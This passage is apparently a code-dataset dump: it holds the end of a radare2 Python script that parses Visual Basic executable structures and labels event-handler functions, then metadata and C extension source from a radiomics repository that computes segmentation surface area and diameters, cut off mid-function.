ctypes.c_uint), # 0xC. Pointer to Static Variable Size integers.\n (\"lpModulePublic\", ctypes.c_uint), # 0x10. Pointer to Public Variables in DATA section\n (\"lpModuleStatic\", ctypes.c_uint), # 0x14. Pointer to Static Variables in DATA section\n (\"lpszObjectName\", ctypes.c_uint), # 0x18. Name of the Object.\n (\"dwMethodCount\", ctypes.c_uint), # 0x1C. Number of Methods in Object.\n (\"lpMethodNames\", ctypes.c_uint), # 0x20. If present, pointer to Method names array.\n (\"bStaticVars\", ctypes.c_uint), # 0x24. Offset to where to copy Static Variables.\n (\"fObjectType\", ctypes.c_uint), # 0x28. Flags defining the Object Type.\n (\"dwNull\", ctypes.c_uint) # 0x2C. Not valid after compilation\n ]\n\nclass CVBPrivateObjectDescriptors(ctypes.Structure):\n _fields_ = [\n (\"lpHeapLink\", ctypes.c_uint), # 0x0. Unused after compilation, always 0.\n (\"lpObjectInfo\", ctypes.c_uint), # 0x4. Pointer to the Object Info for this Object.\n (\"dwReserved\", ctypes.c_uint), # 0x8. Always set to -1 after compiling.\n (\"dwIdeData\", ctypes.c_uint*3), # 0xC. Not valid after compilation.\n (\"lpObjectList\", ctypes.c_uint), # 0x18. Points to the Parent Structure (Array)\n (\"dwIdeData2\", ctypes.c_uint), # 0x1C. Not valid after compilation.\n (\"lpObjectList2\", ctypes.c_uint*3), # 0x20. Points to the Parent Structure (Array).\n (\"dwIdeData3\", ctypes.c_uint*3), # 0x2C. Not valid after compilation.\n (\"dwObjectType\", ctypes.c_uint), # 0x38. Type of the Object described.\n (\"dwIdentifier\", ctypes.c_uint) # 0x3C. Template Version of Structure.\n ]\n\nclass CVBObjectInfo(ctypes.Structure):\n _fields_ = [\n (\"wRefCount\", ctypes.c_ushort), # 0x0. Always 1 after compilation.\n (\"wObjectIndex\", ctypes.c_ushort), # 0x2. Index of this Object.\n (\"lpObjectTable\", ctypes.c_uint), # 0x4. Pointer to the Object Table\n (\"lpIdeData\", ctypes.c_uint), # 0x8. Zero after compilation. Used in IDE only.\n (\"lpPrivateObject\", ctypes.c_uint), # 0xC. Pointer to Private Object Descriptor.\n (\"dwReserved\", ctypes.c_uint), # 0x10. Always -1 after compilation.\n (\"dwNull\", ctypes.c_uint), # 0x14. Unused.\n (\"lpObject\", ctypes.c_uint), # 0x18. Back-Pointer to Public Object Descriptor.\n (\"lpProjectData\", ctypes.c_uint), # 0x1C. Pointer to in-memory Project Object.\n (\"wMethodCount\", ctypes.c_ushort), # 0x20. Number of Methods\n (\"wMethodCount2\", ctypes.c_ushort), # 0x22. Zeroed out after compilation. IDE only.\n (\"lpMethods\", ctypes.c_uint), # 0x24. Pointer to Array of Methods.\n (\"wConstants\", ctypes.c_ushort), # 0x28. Number of Constants in Constant Pool.\n (\"wMaxConstants\", ctypes.c_ushort), # 0x2A. Constants to allocate in Constant Pool.\n (\"lpIdeData2\", ctypes.c_uint), # 0x2C. Valid in IDE only.\n (\"lpIdeData3\", ctypes.c_uint), # 0x30. Valid in IDE only.\n (\"lpConstants\", ctypes.c_uint) # 0x34. Pointer to Constants Pool.\n ]\n\nclass CVBOptionalObjectInfo(ctypes.Structure):\n _fields_ = [\n (\"dwObjectGuids\", ctypes.c_uint), # 0x0. How many GUIDs to Register. 2 = Designer\n (\"lpObjectGuid\", ctypes.c_uint), # 0x4. Unique GUID of the Object *VERIFY*\n (\"dwNull\", ctypes.c_uint), # 0x8. Unused.\n (\"lpuuidObjectTypes\", ctypes.c_uint), # 0xC. Pointer to Array of Object Interface GUIDs\n (\"dwObjectTypeGuids\", ctypes.c_uint), # 0x10. How many GUIDs in the Array above.\n (\"lpControls2\", ctypes.c_uint), # 0x14. Usually the same as lpControls.\n (\"dwNull2\", ctypes.c_uint), # 0x18. Unused.\n (\"lpObjectGuid2\", ctypes.c_uint), # 0x1C. Pointer to Array of Object GUIDs.\n (\"dwControlCount\", ctypes.c_uint), # 0x20. Number of Controls in array below.\n (\"lpControls\", ctypes.c_uint), # 0x24. Pointer to Controls Array.\n (\"wEventCount\", ctypes.c_ushort), # 0x28. Number of Events in Event Array.\n (\"wPCodeCount\", ctypes.c_ushort), # 0x2A. Number of P-Codes used by this Object.\n (\"bWInitializeEvent\", ctypes.c_ushort), # 0x2C. Offset to Initialize Event from Event Table.\n (\"bWTerminateEvent\", ctypes.c_ushort), # 0x2E. Offset to Terminate Event Table.\n (\"lpEvents\", ctypes.c_uint), # 0x30. Pointer to Events Array.\n (\"lpBasicClassObject\", ctypes.c_uint), # 0x34. Pointer to in-memory Class Objects.\n (\"dwNull3\", ctypes.c_uint), # 0x38. Unused.\n (\"lpIdeData\", ctypes.c_uint) # 0x3C. Only valid in IDE.\n ]\n\nclass CVBControlInfo(ctypes.Structure):\n _fields_ = [\n (\"wUnused\", ctypes.c_ushort), # 0x0. Type of control. # Mine\n (\"fControlType\", ctypes.c_ushort), # 0x0. Type of control. # Mine\n\n (\"wEventcount\", ctypes.c_ushort), # 0x4. Number of Event Handlers supported.\n (\"bWEventsOffset\", ctypes.c_ushort), # 0x6. Offset in to Memory struct to copy Events.\n (\"lpGuid\", ctypes.c_uint), # 0x8. Pointer to GUID of this Control.\n (\"dwIndex\", ctypes.c_uint), # 0xC. Index ID of this Control.\n (\"dwNull\", ctypes.c_uint), # 0x10. Unused.\n (\"dwNull2\", ctypes.c_uint), # 0x14. Unused.\n (\"lpEventTable\", ctypes.c_uint), # 0x18. Pointer to Event Handler Table.\n (\"lpIdeData\", ctypes.c_uint), # 0x1C. Valid in IDE only.\n (\"lpszName\", ctypes.c_uint), # 0x20. Name of this Control.\n (\"dwIndexCopy\", ctypes.c_uint) # 0x24. Secondary Index ID of this Control\n ]\n\nclass CVBEventHandlerTable(ctypes.Structure):\n _fields_ = [\n (\"dwNull\", ctypes.c_uint), # 0x0.\n (\"dwUnknown0\", ctypes.c_uint), # 0x4.\n (\"dwUnknown1\", ctypes.c_uint), # 0x8.\n (\"lpEVENT_SINK_QueryInterface\", ctypes.c_uint), # 0xC.\n (\"lpEVENT_SINK_Release\", ctypes.c_uint), # 0x10.\n (\"lpRelease\", ctypes.c_uint), # 0x14.\n (\"lpEntryPoint\", ctypes.c_uint) # 0x18.\n ]\n\nclass CVBGUID(ctypes.Structure):\n _fields_ = [\n (\"Data1\", ctypes.c_uint), # Specifies the first 8 hexadecimal digits of the GUID.\n (\"Data2\", ctypes.c_ushort), # Specifies the first group of 4 hexadecimal digits.\n (\"Data3\", ctypes.c_ushort), # Specifies the second group of 4 hexadecimal digits.\n (\"Data4\", ctypes.c_ubyte*8) # Array of 8 bytes. The first 2 bytes contain the third group of 4 hexadecimal digits.\n # The remaining 6 bytes contain the final 12 hexadecimal digits.\n ]\n\n\nMDLInternalControlFlags = [\n (0x00, 0x00000001, \"PictureBox Object\"),\n (0x01, 0x00000002, \"Label Object\"),\n (0x02, 0x00000004, \"TextBox Object\"),\n (0x03, 0x00000008, \"Frame Object\"),\n (0x04, 0x00000010, \"CommandButton Object\"),\n (0x05, 0x00000020, \"CheckBox Object\"),\n (0x06, 0x00000040, \"OptionButton Object\"),\n (0x07, 0x00000080, \"ComboBox Object\"),\n (0x08, 0x00000100, \"ListBox Object\"),\n (0x09, 0x00000200, \"HScrollBar Object\"),\n (0x0A, 0x00000400, \"VScrollBar Object\"),\n (0x0B, 0x00000800, \"Timer Object\"),\n (0x0C, 0x00001000, \"Print Object\"),\n (0x0D, 0x00002000, \"Form Object\"),\n (0x0E, 0x00004000, \"Screen Object\"),\n (0x0F, 0x00008000, \"Clipboard Object\"),\n (0x10, 0x00010000, \"Drive Object\"),\n (0x11, 0x00020000, \"Dir Object\"),\n (0x12, 0x00040000, \"FileListBox Object\"),\n (0x13, 0x00080000, \"Menu Object\"),\n (0x14, 0x00100000, \"MDIForm Object\"),\n (0x15, 0x00200000, \"App Object\"),\n (0x16, 0x00400000, \"Shape Object\"),\n (0x17, 0x00800000, \"Line Object\"),\n (0x18, 0x01000000, \"Image Object\"),\n (0x19, 0x02000000, \"Unsupported\"),\n (0x1A, 0x04000000, \"Unsupported\"),\n (0x1B, 0x08000000, \"Unsupported\"),\n (0x1C, 0x10000000, \"Unsupported\"),\n (0x1D, 0x20000000, \"Unsupported\"),\n (0x1E, 0x40000000, \"Unsupported\"),\n (0x1F, 0x80000000, \"Unsupported\")\n]\n\nCtrlFlags = [\n (0x00, 0x0000001A, \"PictureBox\"),\n (0x01, 0x00000012, \"Label\"),\n (0x02, 0x00000018, \"TextBox\"),\n (0x03, 0x0000000D, \"Frame\"),\n (0x04, 0x00000011, \"CommandButton\"),\n (0x05, 0x00000000, \"CheckBox\"),\n (0x06, 0x00000013, \"OptionButton\"),\n (0x07, 0x00000000, \"ComboBox\"),\n (0x08, 0x00000015, \"ListBox\"),\n (0x09, 0x00000000, \"HScrollBar\"),\n (0x0A, 0x00000000, \"VScrollBar\"),\n (0x0B, 0x00000001, \"Timer\"),\n (0x0C, 0x00000000, \"Print\"),\n (0x0D, 0x00000000, \"Form\"),\n (0x0E, 0x00000000, \"Screen\"),\n (0x0F, 0x00000000, \"Clipboard\"),\n (0x10, 0x00000000, \"Drive\"),\n (0x11, 0x00000014, \"Dir\"),\n (0x12, 0x00000000, \"FileListBox\"),\n (0x13, 0x00000000, \"Menu\"),\n (0x14, 0x00000000, \"MDIForm\"),\n (0x15, 0x00000000, \"App\"),\n (0x16, 0x00000000, \"Shape\"),\n (0x17, 0x00000000, \"Line\"),\n (0x18, 0x0000000D, \"Image\"),\n (0x19, 0x0000001D, \"Grid\"),\n (0x1A, 0x00000016, \"StatusBar\"),\n (0x1B, 0x0000000A, \"Communication\"),\n (0x1C, 0x00000000, \"Unsupported\"),\n (0x1D, 0x00000000, \"Unsupported\"),\n (0x1E, 0x00000000, \"Unsupported\"),\n (0x1F, 0x00000000, \"Unsupported\")\n]\n\n'''\n[ # 2nd Flag Zone 2nd Flag Zone 2nd Flag Zone\n (0x20, 0x00000001, \"Unsupported\"),\n (0x21, 0x00000002, \"Unsupported\"),\n (0x22, 0x00000004, \"Unsupported\"),\n (0x23, 0x00000008, \"Unsupported\"),\n (0x24, 0x00000010, \"Unsupported\"),\n (0x25, 0x00000020, \"DataQuery Object\"),\n (0x26, 0x00000040, \"OLE Object\"),\n (0x27, 0x00000080, \"Unsupported\"),\n (0x28, 0x00000100, \"UserControl Object\"),\n (0x29, 0x00000200, \"PropertyPage Object\"),\n (0x2A, 0x00000400, \"Document Object\"),\n (0x2B, 0x00000800, \"Unsupported\")\n]\n'''\n\nCtrlButtonEvents = {\n 0x0: \"Click\",\n 0x1: \"DragDrop\",\n 0x2: \"DragOver\",\n 0x3: \"GotFocus\",\n 0x4: \"KeyDown\",\n 0x5: \"KeyPress\",\n 0x6: \"KeyUp\",\n 0x7: \"LostFocus\",\n 0x8: \"MouseDown\",\n 0x9: \"MouseMove\",\n 0xA: \"MouseUp\",\n 0xB: \"OLEDragOver\",\n 0xC: \"OLEDragDrop\",\n 0xD: \"OLEGiveFeedback\",\n 0xE: \"OLEStartDrag\",\n 0xF: \"OLESetData\",\n 0x10: \"OLECompleteDrag\"\n}\n\nCtrlTextboxEvents = {\n 0x0: \"Change\",\n 0x1: \"DragDrop\",\n 0x2: \"DragOver\",\n 0x3: \"GotFocus\",\n 0x4: \"KeyDown\",\n 0x5: \"KeyPress\",\n 0x6: \"KeyUp\",\n 0x7: \"LinkClose\",\n 0x8: \"LinkError\",\n 0x9: \"LinkOpen\",\n 0xA: \"LostFocus\",\n 0xB: \"LinkNotify\",\n 0xC: \"MouseDown\",\n 0xD: \"MouseMove\",\n 0xE: \"MouseUp\",\n 0xF: \"Click\",\n 0x10: \"DblClick\",\n 0x11: \"OLEDragOver\",\n 0x12: \"OLEDragDrop\",\n 0x13: \"OLEGiveFeedback\",\n 0x14: \"OLEStartDrag\",\n 0x15: \"OLESetData\",\n 0x16: \"OLECompleteDrag\",\n 0x17: \"Validate\"\n}\n\nCtrlFormEvents = {\n 0x0: \"DragDrop\",\n 0x1: \"DragOver\",\n 0x2: \"LinkClose\",\n 0x3: \"LinkError\",\n 0x4: \"LinkExecute\",\n 0x5: \"LinkOpen\",\n 0x6: \"Load\",\n 0x7: \"Resize\",\n 0x8: \"Unload\",\n 0x9: \"QueryUnload\",\n 0xA: \"Activate\",\n 0xB: \"Deactivate\",\n 0xC: \"Click\",\n 0xD: \"DblClick\",\n 0xE: \"GotFocus\",\n 0xF: \"KeyDown\",\n 0x10: \"KeyPress\",\n 0x11: \"KeyUp\",\n 0x12: \"LostFocus\",\n 0x13: \"MouseDown\",\n 0x14: \"MouseMove\",\n 0x15: \"MouseUp\",\n 0x16: \"Paint\",\n 0x17: \"Initialize\",\n 0x18: \"Terminate\",\n 0x19: \"OLEDragOver\",\n 0x1A: \"OLEDragDrop\",\n 0x1B: \"OLEGiveFeedback\",\n 0x1C: \"OLEStartDrag\",\n 0x1D: \"OLESetData\",\n 0x1E: \"OLECompleteDrag\"\n}\n\nCtrlFileEvents = {\n 0x0: \"Click\",\n 0x1: \"DblClick\",\n 0x2: \"DragDrop\",\n 0x3: \"DragOver\",\n 0x4: \"GotFocus\",\n 0x5: \"KeyDown\",\n 0x6: \"KeyPress\",\n 0x7: \"KeyUp\",\n 0x8: \"LostFocus\",\n 0x9: \"MouseDown\",\n 0xA: \"MouseMove\",\n 0xB: \"MouseUp\",\n 0xC: \"PathChange\",\n 0xD: \"PatternChange\",\n 0xE: \"OLEDragOver\",\n 0xF: \"OLEDragDrop\",\n 0x10: \"OLEGiveFeedback\",\n 0x11: \"OLEStartDrag\",\n 0x12: \"OLESetData\",\n 0x13: \"OLECompleteDrag\",\n 0x14: \"Scroll\",\n 0x15: \"Validate\"\n}\n\nCtrlOptionEvents = {\n 0x0: \"Click\",\n 0x1: \"DblClick\",\n 0x2: \"DragDrop\",\n 0x3: \"DragOver\",\n 0x4: \"GotFocus\",\n 0x5: \"KeyDown\",\n 0x6: \"KeyPress\",\n 0x7: \"KeyUp\",\n 0x8: \"LostFocus\",\n 0x9: \"MouseDown\",\n 0xA: \"MouseMove\",\n 0xB: \"MouseUp\",\n 0xC: \"OLEDragOver\",\n 0xD: \"OLEDragDrop\",\n 0xE: \"OLEGiveFeedback\",\n 0xF: \"OLEStartDrag\",\n 0x10: \"OLESetData\",\n 0x11: \"OLECompleteDrag\",\n 0x12: \"Validate\"\n}\n\nCtrlComboEvents = {\n 0x0: \"Change\",\n 0x1: \"Click\",\n 0x2: \"DblClick\",\n 0x3: \"DragDrop\",\n 0x4: \"DragOver\",\n 0x5: \"DropDown\",\n 0x6: \"GotFocus\",\n 0x7: \"KeyDown\",\n 0x8: \"KeyPress\",\n 0x9: \"KeyUp\",\n 0xA: \"LostFocus\",\n 0xB: \"OLEDragOver\",\n 0xC: \"OLEDragDrop\",\n 0xD: \"OLEGiveFeedback\",\n 0xE: \"OLEStartDrag\",\n 0xF: \"OLESetData\",\n 0x10: \"OLECompleteDrag\",\n 0x11: \"Scroll\",\n 0x12: \"Validate\"\n}\n\nCtrlLabelEvents = {\n 0x0: \"Change\",\n 0x1: \"Click\",\n 0x2: \"DblClick\",\n 0x3: \"DragDrop\",\n 0x4: \"DragOver\",\n 0x5: \"LinkClose\",\n 0x6: \"LinkError\",\n 0x7: \"LinkOpen\",\n 0x8: \"MouseDown\",\n 0x9: \"MouseMove\",\n 0xA: \"MouseUp\",\n 0xB: \"LinkNotify\",\n 0xC: \"OLEDragOver\",\n 0xD: \"OLEDragDrop\",\n 0xE: \"OLEGiveFeedback\",\n 0xF: \"OLEStartDrag\",\n 0x10: \"OLESetData\",\n 0x11: \"OLECompleteDrag\"\n}\n\nCtrlMenuEvents = {\n 0x0: \"Click\"\n}\n\nCtrlTimerEvents = {\n 0x0: \"Timer\"\n}\n\nCT_BUTTON = 0x33AD4EF2\nCT_TEXTBOX = 0x33AD4EE2\nCT_TIMER = 0x33AD4F2A\nCT_FORM = 0x33AD4F3A\nCT_FILE = 0x33AD4F62\nCT_OPTION = 0x33AD4F02\nCT_COMBOBOX = 0x33AD4F03\nCT_COMBOBOX2 = 0x33AD4F0A\nCT_MENU = 0x33AD4F6A\nCT_LABEL = 0x33AD4EDA\n\nCtrlEvents = {\n CT_BUTTON: CtrlButtonEvents,\n CT_TEXTBOX: CtrlTextboxEvents,\n CT_TIMER: CtrlTimerEvents,\n CT_FORM: CtrlFormEvents,\n CT_FILE: CtrlFileEvents,\n CT_OPTION: CtrlOptionEvents,\n CT_COMBOBOX: CtrlComboEvents,\n CT_COMBOBOX2: CtrlComboEvents,\n CT_MENU: CtrlMenuEvents,\n CT_LABEL: CtrlLabelEvents\n}\n\n\nB2S = lambda M: \"\".join(map(chr, M))\n\n\nHF_LENGTH = 100 # Header & Footer : Fixed Length\n\n\ndef IsAddressValid(addr):\n obj = r2.cmdj(\"iSj\")\n result = False\n for sec in obj:\n test = (addr >= sec[\"vaddr\"])\n test = test and (addr <= sec[\"vaddr\"] + sec[\"vsize\"])\n result = result or test\n return result\n\n\ndef Dword(addr):\n bts = r2.cmdj(\"pxj 4 @0x%x\" % addr)\n if sys.version_info[0] == 2:\n bts = \"\".join([chr(i) for i in bts])\n else:\n bts = bytes(bts)\n return ctypes.c_uint.from_buffer_copy(bts).value\n\n\ndef ParseStructure(a, t):\n global r2\n p = r2.cmdj(\"pxj %d @ 0x%x\" % (ctypes.sizeof(t), a))\n if p is None:\n return None\n if sys.version_info[0] == 2:\n p = b\"\".join([chr(i) for i in p])\n else:\n p = bytes(p)\n return t.from_buffer_copy(p)\n\n\ndef GetControlDescriptionByTypeID(TypeID):\n result = \"\"\n for e in CtrlFlags:\n index, typeid, description = e[0:len(e)]\n if typeid == TypeID:\n if len(result) != 0:\n result += (\" or \" + description)\n else:\n result = description\n return result\n\n\ndef CreateFunction(address, name):\n result = True\n r2.cmd(\"af @0x%x\" % address)\n r2.cmd(\"afn %s 0x%x\" % (name, address))\n return result\n\n\ndef CreateFlag(address, name):\n r2.cmd(\"f %s @0x%x\" % (name, address))\n\n\ndef GetEventByID(ctrl_type, event_id):\n ctrl_events, result = None, \"Unknown\"\n for ctrlType in CtrlEvents.keys():\n if ctrlType == ctrl_type:\n ctrl_events = CtrlEvents[ctrlType]\n break\n if ctrl_events is None:\n return result\n for eventID in ctrl_events.keys():\n if eventID == event_id:\n result = ctrl_events[eventID]\n break\n return result\n\n\ndef GetString(addr):\n return r2.cmd(\"psz @0x%x\" % addr).strip()\n\n\ndef ParseControlInfo(object_name, obj_addr):\n VBControlInfo = ParseStructure(obj_addr, CVBControlInfo)\n control_name = GetString(VBControlInfo.lpszName)\n VBGUID = ParseStructure(VBControlInfo.lpGuid, CVBGUID)\n control_type = VBGUID.Data1\n VBEventHandlerTable = ParseStructure(VBControlInfo.lpEventTable, CVBEventHandlerTable)\n entry_point = VBControlInfo.lpEventTable + sizeof(CVBEventHandlerTable) - 4\n for control_id in range(0, VBControlInfo.fControlType):\n p = entry_point + 4*control_id\n if IsAddressValid(p):\n addr_event = Dword(p)\n if IsAddressValid(addr_event):\n print(\"Trampoline at %x\" % addr_event)\n print(\"Event: %s\" %\n (control_name + \"_\" +\n GetEventByID(control_type, control_id)))\n # Parse trampoline and flag the correct function\n obj = r2.cmdj(\"pdj 2 @0x%x\" % addr_event)\n jump = obj[1]\n if obj[0][\"type\"] == \"sub\" and jump[\"type\"] == \"jmp\":\n real_func = jump[\"jump\"]\n control_type = GetEventByID(control_type, control_id)\n if control_type == \"Unknown\" :\n control_type = \"%x\" % real_func\n event_name = \"fn.%s_%s_%s\" % (object_name, control_name,\n control_type)\n CreateFunction(real_func, event_name)\n\n\ndef ParsePrivateObjectInfo(object_name, obj_addr):\n VBOptionalObjectInfo = ParseStructure(obj_addr, CVBOptionalObjectInfo)\n for j in range(0, VBOptionalObjectInfo.dwControlCount):\n ### CONTROL INFO ###\n addr_vb_control_info = VBOptionalObjectInfo.lpControls + j*sizeof(CVBControlInfo)\n if IsAddressValid(addr_vb_control_info ):\n ParseControlInfo(object_name, addr_vb_control_info)\n\n for j in range(0, VBOptionalObjectInfo.wEventCount):\n addr_vb_event = VBOptionalObjectInfo.lpEvents + j*4\n if not IsAddressValid(addr_vb_event): return STATUS()\n event_eat = Dword(addr_vb_event) # eat: event address table\n if not IsAddressValid(event_eat): return STATUS()\n\n # This method belongs VB Table or User Defined? 0xFFFF -> User Defined.\n addr_magic = event_eat - 4\n if not IsAddressValid(addr_magic): return STATUS()\n magic = Dword(addr_magic)\n is_user_defined = (magic == 0xFFFF)\n\n obj = r2.cmdj(\"pdj 1 @0x%x\" % event_eat)\n jump = obj[0]\n if jump[\"type\"] == \"jmp\":\n event = jump[\"jump\"]\n if is_user_defined == True:\n event_name = \"fn.Unknown_%08X\" % event\n CreateFunction(event, event_name)\n\ndef ParseObjectDescriptor(obj_addr):\n VBPublicObjectDescriptor = ParseStructure(obj_addr,\n CVBPublicObjectDescriptors)\n object_name = GetString(VBPublicObjectDescriptor.lpszObjectName)\n CreateFlag(obj_addr, \"VB.\" + object_name + \"_Descriptor\")\n\n # Parse ObjectInfo\n VBObjectInfo = ParseStructure(VBPublicObjectDescriptor.lpObjectInfo, CVBObjectInfo)\n object_name = GetString(VBPublicObjectDescriptor.lpszObjectName)\n CreateFlag(VBPublicObjectDescriptor.lpObjectInfo, object_name + \".ObjectInfo\")\n\n addr_vb_optional_object_info = VBPublicObjectDescriptor.lpObjectInfo + sizeof(CVBObjectInfo)\n if VBObjectInfo.lpConstants != addr_vb_optional_object_info:\n ParsePrivateObjectInfo(object_name, addr_vb_optional_object_info)\n\n\nsizeof = ctypes.sizeof\nr2 = r2pipe.open()\ninstr = r2.cmdj(\"pdj 2 @entry0\")\naddr_vb_header = instr[0][\"ptr\"]\nVBHeader = ParseStructure(addr_vb_header, CVBHeader)\nVBProjectInfo = ParseStructure(VBHeader.lpProjectData, CVBProjectInfo)\nVBObjectTable = ParseStructure(VBProjectInfo.lpObjectTable, CVBObjectTable)\n\n# PUBLIC OBJECT DESCRIPTORS #\nfor i in range(0, VBObjectTable.dwTotalObjects):\n addr_vb_public_object_descriptors = (VBObjectTable.lpObjectArray +\n i*sizeof(CVBPublicObjectDescriptors))\n ParseObjectDescriptor(addr_vb_public_object_descriptors)\n" } ]
2
drmaxchen/pyradio
https://github.com/drmaxchen/pyradio
dd14e8796e1dea745cfe8fcfd57bf71a8e1e8fa0
f2e46856425cfb233d29d391199bfb9b85824b06
48f49bfe57008ae0c30f602bb14ff3b11fd7d447
refs/heads/master
2020-03-27T23:24:39.552705
2018-09-04T08:46:39
2018-09-04T08:46:39
147,315,093
0
1
null
null
null
null
null
[ { "alpha_fraction": 0.7513227462768555, "alphanum_fraction": 0.7513227462768555, "avg_line_length": 93.5, "blob_id": "7b0160567e3016cdf6185bd35aafb814f56da4cf", "content_id": "093c8bdb3b991ef32fe8cbb4462d3c3fbbdade73", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 189, "license_type": "permissive", "max_line_length": 104, "num_lines": 2, "path": "/radiomics/src/cshape.h", "repo_name": "drmaxchen/pyradio", "src_encoding": "UTF-8", "text": "double calculate_surfacearea(char *mask, int *size, int *strides, double *spacing);\nint calculate_diameter(char *mask, int *size, int *strides, double *spacing, int Ns, double *diameters);\n" }, { "alpha_fraction": 0.6456996202468872, "alphanum_fraction": 0.6525459885597229, "avg_line_length": 31.160551071166992, "blob_id": "9b2481d181cf785153ed7a890af3b1c66308d503", "content_id": "b0c3e91d78dff3a848c49e0651ff85d5728a41ec", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 7011, "license_type": "permissive", "max_line_length": 142, "num_lines": 218, "path": "/radiomics/src/_cshape.c", "repo_name": "drmaxchen/pyradio", "src_encoding": "UTF-8", "text": "#define NPY_NO_DEPRECATED_API NPY_1_7_API_VERSION\n\n#include <stdlib.h>\n#include <Python.h>\n#include <numpy/arrayobject.h>\n#include \"cshape.h\"\n\nstatic char module_docstring[] = \"This module links to C-compiled code for efficient calculation of the surface area \"\n \"in the pyRadiomics package. It provides fast calculation using a marching cubes \"\n \"algortihm, accessed via \"\"calculate_surfacearea\"\". Arguments for this function\"\n \"are positional and consist of two numpy arrays, mask and pixelspacing, which must \"\n \"be supplied in this order. Pixelspacing is a 3 element vector containing the pixel\"\n \"spacing in z, y and x dimension, respectively. All non-zero elements in mask are \"\n \"considered to be a part of the segmentation and are included in the algorithm.\";\nstatic char surface_docstring[] = \"Arguments: Mask, PixelSpacing, uses a marching cubes algorithm to calculate an \"\n \"approximation to the total surface area. The isovalue is considered to be situated \"\n \"midway between a voxel that is part of the segmentation and a voxel that is not.\";\nstatic char diameter_docstring[] = \"Arguments: Mask, PixelSpacing, ROI size.\";\n\nstatic PyObject *cshape_calculate_surfacearea(PyObject *self, PyObject *args);\nstatic PyObject *cshape_calculate_diameter(PyObject *self, PyObject *args);\n\nint check_arrays(PyArrayObject *mask_arr, PyArrayObject *spacing_arr, int *size, int *strides);\n\nstatic PyMethodDef module_methods[] = {\n //{\"calculate_\", cmatrices_, METH_VARARGS, _docstring},\n { \"calculate_surfacearea\", cshape_calculate_surfacearea, METH_VARARGS, surface_docstring },\n { \"calculate_diameter\", cshape_calculate_diameter,METH_VARARGS, diameter_docstring},\n { NULL, NULL, 0, NULL }\n};\n\n#if PY_MAJOR_VERSION >= 3\n\nstatic struct PyModuleDef moduledef = {\n PyModuleDef_HEAD_INIT,\n \"_cshape\", /* m_name */\n module_docstring, /* m_doc */\n -1, /* m_size */\n module_methods, /* m_methods */\n NULL, /* m_reload */\n NULL, /* m_traverse */\n NULL, /* m_clear */\n NULL, /* m_free */\n};\n\n#endif\n\nstatic PyObject *\nmoduleinit(void)\n{\n PyObject *m;\n\n#if PY_MAJOR_VERSION >= 3\n m = PyModule_Create(&moduledef);\n#else\n m = Py_InitModule3(\"_cshape\",\n module_methods, module_docstring);\n#endif\n\n if (m == NULL)\n return NULL;\n\n return m;\n}\n\n#if PY_MAJOR_VERSION < 3\n PyMODINIT_FUNC\n init_cshape(void)\n {\n // Initialize numpy functionality\n import_array();\n\n moduleinit();\n }\n#else\n PyMODINIT_FUNC\n PyInit__cshape(void)\n {\n // Initialize numpy functionality\n import_array();\n\n return moduleinit();\n }\n#endif\n\nstatic PyObject *cshape_calculate_surfacearea(PyObject *self, PyObject *args)\n{\n PyObject *mask_obj, *spacing_obj;\n PyArrayObject *mask_arr, *spacing_arr;\n int size[3];\n int strides[3];\n char *mask;\n double *spacing;\n double SA;\n // Parse the input tuple\n if (!PyArg_ParseTuple(args, \"OO\", &mask_obj, &spacing_obj))\n return NULL;\n\n // Interpret the input as numpy arrays\n mask_arr = (PyArrayObject *)PyArray_FROM_OTF(mask_obj, NPY_BYTE, NPY_ARRAY_FORCECAST | NPY_ARRAY_UPDATEIFCOPY | NPY_ARRAY_IN_ARRAY);\n spacing_arr = (PyArrayObject *)PyArray_FROM_OTF(spacing_obj, NPY_DOUBLE, NPY_ARRAY_FORCECAST | NPY_ARRAY_UPDATEIFCOPY | NPY_ARRAY_IN_ARRAY);\n\n if (check_arrays(mask_arr, spacing_arr, size, strides) > 0) return NULL;\n\n // Get arrays in Ctype\n mask = (char *)PyArray_DATA(mask_arr);\n spacing = (double *)PyArray_DATA(spacing_arr);\n\n //Calculate Surface Area\n SA = calculate_surfacearea(mask, size, strides, spacing);\n\n // Clean up\n Py_XDECREF(mask_arr);\n Py_XDECREF(spacing_arr);\n\n if (SA < 0) // if SA < 0, an error has occurred\n {\n PyErr_SetString(PyExc_RuntimeError, \"Calculation of Surface Area Failed.\");\n return NULL;\n }\n\n return Py_BuildValue(\"f\", SA);\n}\n\nstatic PyObject *cshape_calculate_diameter(PyObject *self, PyObject *args)\n{\n PyObject *mask_obj, *spacing_obj;\n PyArrayObject *mask_arr, *spacing_arr;\n int Ns;\n int size[3];\n int strides[3];\n char *mask;\n double *spacing;\n double *diameters;\n PyObject *rslt;\n\n // Parse the input tuple\n if (!PyArg_ParseTuple(args, \"OOi\", &mask_obj, &spacing_obj, &Ns))\n return NULL;\n\n // Interpret the input as numpy arrays\n mask_arr = (PyArrayObject *)PyArray_FROM_OTF(mask_obj, NPY_BYTE, NPY_ARRAY_FORCECAST | NPY_ARRAY_UPDATEIFCOPY | NPY_ARRAY_IN_ARRAY);\n spacing_arr = (PyArrayObject *)PyArray_FROM_OTF(spacing_obj, NPY_DOUBLE, NPY_ARRAY_FORCECAST | NPY_ARRAY_UPDATEIFCOPY | NPY_ARRAY_IN_ARRAY);\n\n if (check_arrays(mask_arr, spacing_arr, size, strides) > 0) return NULL;\n\n // Get arrays in Ctype\n mask = (char *)PyArray_DATA(mask_arr);\n spacing = (double *)PyArray_DATA(spacing_arr);\n\n // Initialize output array (elements not set)\n diameters = (double *)calloc(4, sizeof(double));\n\n // Calculating Max 3D Diameter\n if (!calculate_diameter(mask, size, strides, spacing, Ns, diameters))\n {\n Py_XDECREF(mask_arr);\n Py_XDECREF(spacing_arr);\n free(diameters);\n PyErr_SetString(PyExc_RuntimeError, \"Calculation of maximum 3D diameter failed.\");\n return NULL;\n }\n\n rslt = Py_BuildValue(\"ffff\", diameters[0], diameters[1], diameters[2], diameters[3]);\n\n // Clean up\n Py_XDECREF(mask_arr);\n Py_XDECREF(spacing_arr);\n free(diameters);\n\n return rslt;\n}\n\nint check_arrays(PyArrayObject *mask_arr, PyArrayObject *spacing_arr, int *size, int *strides)\n{\n if (mask_arr == NULL || spacing_arr == NULL)\n {\n Py_XDECREF(mask_arr);\n Py_XDECREF(spacing_arr);\n PyErr_SetString(PyExc_RuntimeError, \"Error parsing array arguments.\");\n 